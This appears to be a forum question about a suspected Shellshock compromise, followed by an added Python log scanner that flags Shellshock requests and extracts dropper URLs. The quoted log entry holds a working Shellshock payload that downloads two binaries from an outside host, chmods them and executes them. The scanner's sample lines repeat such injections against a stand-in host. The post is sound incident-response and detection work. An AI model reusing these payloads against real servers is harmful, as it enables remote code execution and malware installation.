We discovered the binaries /tmp/susu1 and /tmp/susu2, executed by the webserver user.
In the logs we have the following entries:
[24/Sep/2015:06:09:34 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 301 0 "() { :;} ;
echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";
''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''
$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''
if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''
$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''
$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
But we found only the codes 301, 302, 403, 404 and 500 for such requests, and no 200 code, which would indicate that the hack was successful.
Is this a common security problem? How can it be fixed? Or how can it be further tracked down?
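As an added example (not part of the original question), here is a small Python scanner for access logs in Apache's combined format: it flags the Shellshock function-definition pattern in the Referer and User-Agent fields, extracts any download URLs from the payload, and classifies each hit by status code, since a bash-backed CGI only parses the malicious environment when it actually runs (a 200 or a 500 from malformed output), while a redirect, 403 or 404 means the CGI was never started. The log lines and the dropper.example host are constructed for this example.

```python
import re
from dataclasses import dataclass

# Shellshock (CVE-2014-6271) trigger: an exported function definition "() { ... }" followed by
# trailing commands. Apache copies client headers into CGI environment variables, which an
# unpatched bash parses on startup, so the Referer and User-Agent fields are where it shows up.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")
# A quoted log field, allowing the \" escapes Apache writes for embedded quotes.
Q = r'"((?:[^"\\]|\\.)*)"'
# Combined log format tail: "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(Q + r" (\d{3}) (\S+) " + Q + " " + Q)
URL_RE = re.compile(r"""https?://[^\s"'\\]+""")

# Constructed sample lines modelled on the question: one payload in the Referer that hit a
# redirect, one in the User-Agent that reached a CGI, and one benign request.
SAMPLE_LOG = r"""
203.0.113.5 - - [24/Sep/2015:06:09:34 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 301 0 "() { :;} ; echo; /usr/local/bin/php -r '$a = \"http://dropper.example/s/susu1\";'" "-"
203.0.113.5 - - [24/Sep/2015:06:10:02 +0200] "GET /cgi-bin/status.cgi HTTP/1.0" 500 611 "-" "() { :;}; /bin/bash -c 'echo'"
198.51.100.7 - - [24/Sep/2015:06:11:40 +0200] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
""".strip().splitlines()


@dataclass
class Hit:
    request: str
    status: int
    verdict: str
    urls: list


def classify(status):
    """Heuristic: 200 or 500 means the CGI ran, so bash may have parsed the payload;
    redirects, 403 and 404 mean the request never reached a CGI process."""
    if status in (200, 500):
        return "possible"
    if 300 <= status < 400 or status in (403, 404):
        return "unlikely"
    return "unknown"


def scan(lines):
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        req, status, _size, ref, ua = m.groups()
        if not (SHELLSHOCK_RE.search(ref) or SHELLSHOCK_RE.search(ua)):
            continue
        status = int(status)
        hits.append(Hit(req, status, classify(status), URL_RE.findall(ref + " " + ua)))
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"{h.status} {h.verdict:8s} {h.request}  drops: {', '.join(h.urls) or '-'}")
```

Hits classified as "possible" are the ones worth correlating with the /tmp timestamps and with outbound connections to the extracted URLs; a "unlikely" verdict only says the web server never spawned the CGI for that request.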